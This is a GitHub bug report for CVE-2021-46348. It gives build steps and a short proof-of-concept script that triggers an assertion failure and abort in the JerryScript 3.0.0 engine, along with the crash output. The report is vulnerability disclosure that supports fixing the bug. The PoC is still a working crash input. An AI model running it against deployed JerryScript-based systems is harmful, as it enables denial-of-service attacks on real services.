Headline
CVE-2021-46348: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. · Issue #4941 · jerryscript-project/jerryscript
There is an Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at /jerry-core/ecma/base/ecma-literal-storage.c in JerryScript 3.0.0.
JerryScript revision
Commit: a6ab5e9
Version: v3.0.0
Build platform
Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20
Test casepoc.js
var a = new Array(286331153, 572662306, 858993459, 1145324612, 303174162, 589505315, 305419888, 30583);
var handler = {
getPrototypeOf: function (target, name) {
return a;
}
};
var p = new Proxy([], handler);
var b = [
{},
[],
'natalie'
];
__proto__.__proto__ = p;
eval("function test_configurable_accessor() { print('replacement'); }");
[].flat.call(b);
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
Unhandled exception: 0: <eval>:1:64 1: poc.js:14:1 ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 987 abort jerry poc.js
Credits: Found by OWL337 team.